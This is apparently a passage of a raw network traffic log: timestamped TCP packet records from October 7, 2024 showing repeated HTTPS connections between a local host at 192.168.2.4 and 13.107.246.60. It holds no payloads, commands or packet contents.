                Oct 7, 2024 03:27:13.085683107 CEST4434992513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.085690022 CEST4434992513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.086858988 CEST4434992613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.089863062 CEST49926443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.089863062 CEST49930443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.089878082 CEST4434992613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.089895964 CEST4434993013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.090204000 CEST49930443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.090208054 CEST49926443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.090213060 CEST4434992613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.090846062 CEST49930443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.090861082 CEST4434993013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.196017981 CEST4434992713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.196537018 CEST49927443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.196580887 CEST4434992713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.197000980 CEST49927443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.197007895 CEST4434992713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.203422070 CEST4434992613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.203476906 CEST4434992613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.203569889 CEST4434992613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.203762054 CEST49926443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.203835964 CEST49926443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.203835964 CEST49926443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.203943014 CEST49926443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.203953981 CEST4434992613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.207050085 CEST49931443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.207146883 CEST4434993113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.209808111 CEST49931443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.209809065 CEST49931443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.209886074 CEST4434993113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.294904947 CEST4434992713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.295012951 CEST4434992713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.299360037 CEST49927443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.311311960 CEST49927443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.311311960 CEST49927443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.311348915 CEST4434992713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.311373949 CEST4434992713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.327084064 CEST49932443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.327171087 CEST4434993213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.328421116 CEST49932443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.332344055 CEST4434992813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.333599091 CEST49932443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.333635092 CEST4434993213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.333988905 CEST49928443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.334038019 CEST4434992813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.334909916 CEST49928443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.334923983 CEST4434992813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.433828115 CEST4434992813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.434051037 CEST4434992813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.434103966 CEST4434992813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.434135914 CEST49928443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.434204102 CEST49928443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.444612980 CEST49928443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.444612980 CEST49928443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.444642067 CEST4434992813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.444663048 CEST4434992813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.454256058 CEST49933443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.454283953 CEST4434993313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.454562902 CEST49933443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.456048965 CEST49933443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.456083059 CEST4434993313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.619667053 CEST4434992913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.620881081 CEST49929443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.620899916 CEST4434992913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.620987892 CEST49929443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.620992899 CEST4434992913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.718533993 CEST4434992913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.718628883 CEST4434992913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.718707085 CEST49929443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.718857050 CEST49929443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.718857050 CEST49929443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.718871117 CEST4434992913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.718878984 CEST4434992913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.723200083 CEST49934443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.723225117 CEST4434993413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.723284006 CEST49934443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.723712921 CEST49934443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.723726034 CEST4434993413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.743305922 CEST4434993013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.743779898 CEST49930443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.743788004 CEST4434993013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.744262934 CEST49930443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.744267941 CEST4434993013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.843225002 CEST4434993013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.843276978 CEST4434993013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.843327045 CEST49930443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.843337059 CEST4434993013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.843370914 CEST4434993013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.843416929 CEST49930443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.843565941 CEST49930443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.843573093 CEST4434993013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.843583107 CEST49930443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.843586922 CEST4434993013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.847845078 CEST49935443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.847913027 CEST4434993513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.848004103 CEST49935443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.848150015 CEST49935443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.848172903 CEST4434993513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.876265049 CEST4434993113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.876653910 CEST49931443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.876676083 CEST4434993113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.877341032 CEST49931443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.877347946 CEST4434993113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.965908051 CEST4434993213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.966677904 CEST49932443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.966706991 CEST4434993213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.967113018 CEST49932443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.967123985 CEST4434993213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.977607012 CEST4434993113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.977796078 CEST4434993113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.977854967 CEST49931443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.977893114 CEST49931443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.977906942 CEST4434993113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.977920055 CEST49931443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.977926970 CEST4434993113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.980357885 CEST49936443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.980387926 CEST4434993613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.980509996 CEST49936443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.980577946 CEST49936443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.980602026 CEST4434993613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.065427065 CEST4434993213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.065501928 CEST4434993213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.065541983 CEST4434993213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.065557957 CEST49932443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.065593004 CEST49932443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.067482948 CEST49932443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.067512989 CEST4434993213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.067539930 CEST49932443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.067555904 CEST4434993213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.070508003 CEST49937443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.070595980 CEST4434993713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.070676088 CEST49937443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.070841074 CEST49937443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.070877075 CEST4434993713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.093548059 CEST4434993313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.093888044 CEST49933443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.093907118 CEST4434993313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.094335079 CEST49933443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.094338894 CEST4434993313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.194099903 CEST4434993313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.194195986 CEST4434993313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.194248915 CEST49933443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.197573900 CEST49933443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.197597027 CEST4434993313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.197613001 CEST49933443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.197618008 CEST4434993313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.204018116 CEST49938443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.204076052 CEST4434993813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.204143047 CEST49938443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.204353094 CEST49938443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.204364061 CEST4434993813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.358429909 CEST4434993413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.359154940 CEST49934443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.359189987 CEST4434993413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.359786034 CEST49934443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.359790087 CEST4434993413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.457161903 CEST4434993413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.457189083 CEST4434993413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.457233906 CEST49934443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.457252979 CEST4434993413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.457288980 CEST4434993413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.457329988 CEST49934443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.457556009 CEST49934443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.457568884 CEST4434993413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.460730076 CEST49939443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.460766077 CEST4434993913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.461004972 CEST49939443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.461004972 CEST49939443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.461030960 CEST4434993913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.489866972 CEST4434993513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.490252018 CEST49935443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.490287066 CEST4434993513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.490704060 CEST49935443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.490709066 CEST4434993513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.607108116 CEST4434993513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.607158899 CEST4434993513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.607208967 CEST49935443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.607269049 CEST4434993513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.607306004 CEST4434993513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.607371092 CEST49935443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.607438087 CEST49935443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.607438087 CEST49935443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.607472897 CEST4434993513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.607496977 CEST4434993513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.609976053 CEST49940443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.610018015 CEST4434994013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.610075951 CEST49940443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.610192060 CEST49940443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.610202074 CEST4434994013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.623613119 CEST4434993613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.624262094 CEST49936443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.624270916 CEST4434993613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.624453068 CEST49936443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.624459028 CEST4434993613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.712901115 CEST4434993713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.713253021 CEST49937443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.713315010 CEST4434993713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.713917971 CEST49937443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.713931084 CEST4434993713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.723612070 CEST4434993613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.723705053 CEST4434993613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.723825932 CEST4434993613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.723860025 CEST49936443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.723896980 CEST49936443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.723932028 CEST49936443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.723932028 CEST49936443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.723943949 CEST4434993613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.723952055 CEST4434993613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.726196051 CEST49941443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.726283073 CEST4434994113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.726391077 CEST49941443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.726533890 CEST49941443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.726584911 CEST4434994113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.832433939 CEST4434993713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.832875013 CEST4434993713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.832926989 CEST49937443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.832983017 CEST49937443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.832998037 CEST4434993713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.833014011 CEST49937443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.833020926 CEST4434993713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.835123062 CEST49942443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.835169077 CEST4434994213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.835309029 CEST49942443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.835458994 CEST49942443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.835489035 CEST4434994213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.866749048 CEST4434993813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.867083073 CEST49938443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.867098093 CEST4434993813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.867453098 CEST49938443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.867460012 CEST4434993813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.970736980 CEST4434993813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.970891953 CEST4434993813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.970954895 CEST4434993813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.971019983 CEST49938443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.971107960 CEST49938443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.971124887 CEST4434993813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.971148968 CEST49938443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.971157074 CEST4434993813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.974383116 CEST49943443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.974437952 CEST4434994313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:14.974503994 CEST49943443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.974704027 CEST49943443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:14.974718094 CEST4434994313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.118587017 CEST4434993913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.119223118 CEST49939443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.119240046 CEST4434993913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.119801044 CEST49939443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.119806051 CEST4434993913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.218933105 CEST4434993913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.219069958 CEST4434993913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.219180107 CEST49939443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.219428062 CEST49939443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.219444990 CEST4434993913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.219489098 CEST49939443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.219497919 CEST4434993913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.222582102 CEST49944443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.222646952 CEST4434994413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.222707987 CEST49944443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.222892046 CEST49944443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.222908974 CEST4434994413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.277132034 CEST4434994013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.278450966 CEST49940443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.278487921 CEST4434994013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.278991938 CEST49940443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.278997898 CEST4434994013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.367628098 CEST4434994113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.368200064 CEST49941443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.368226051 CEST4434994113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.368724108 CEST49941443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.368727922 CEST4434994113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.380410910 CEST4434994013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.380609989 CEST4434994013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.380721092 CEST4434994013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.380779028 CEST49940443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.380812883 CEST49940443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.380832911 CEST4434994013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.380846977 CEST49940443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.380853891 CEST4434994013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.383971930 CEST49945443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.384011984 CEST4434994513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.384217978 CEST49945443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.384388924 CEST49945443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.384399891 CEST4434994513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.467154980 CEST4434994113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.467267036 CEST4434994113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.467487097 CEST49941443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.467765093 CEST49941443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.467787981 CEST4434994113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.467802048 CEST49941443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.467807055 CEST4434994113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.469618082 CEST4434994213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.470554113 CEST49942443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.470568895 CEST4434994213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.471205950 CEST49942443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.471211910 CEST4434994213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.471648932 CEST49946443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.471707106 CEST4434994613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.472181082 CEST49946443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.472301006 CEST49946443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.472310066 CEST4434994613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.546457052 CEST4434994313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.546919107 CEST49943443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.546951056 CEST4434994313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.547389984 CEST49943443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.547398090 CEST4434994313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.569561958 CEST4434994213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.569591999 CEST4434994213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.569642067 CEST4434994213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.569720030 CEST49942443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.569838047 CEST49942443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.569838047 CEST49942443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.569885969 CEST4434994213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.569915056 CEST4434994213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.572438955 CEST49947443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.572535992 CEST4434994713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.572981119 CEST49947443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.573250055 CEST49947443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.573287010 CEST4434994713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.649028063 CEST4434994313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.649132013 CEST4434994313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.649204016 CEST49943443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.649339914 CEST49943443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.649358034 CEST4434994313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.649369955 CEST49943443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.649378061 CEST4434994313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.651726961 CEST49948443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.651768923 CEST4434994813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.652679920 CEST49948443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.652847052 CEST49948443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.652859926 CEST4434994813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.862163067 CEST4434994413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.862711906 CEST49944443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.862751961 CEST4434994413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.863325119 CEST49944443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.863333941 CEST4434994413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.963990927 CEST4434994413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.964138985 CEST4434994413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.964222908 CEST49944443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.964261055 CEST4434994413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.964287996 CEST4434994413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.964339018 CEST49944443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.964392900 CEST49944443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.964392900 CEST49944443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.964437962 CEST4434994413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.964462042 CEST4434994413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.967405081 CEST49949443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.967495918 CEST4434994913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:15.967581034 CEST49949443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.967706919 CEST49949443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:15.967736959 CEST4434994913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.028635979 CEST4434994513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.029016972 CEST49945443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.029077053 CEST4434994513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.029382944 CEST49945443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.029397011 CEST4434994513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.128663063 CEST4434994513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.128808975 CEST4434994513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.128875017 CEST49945443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.128958941 CEST49945443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.128997087 CEST4434994513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.129029036 CEST49945443192.168.2.413.107.246.60
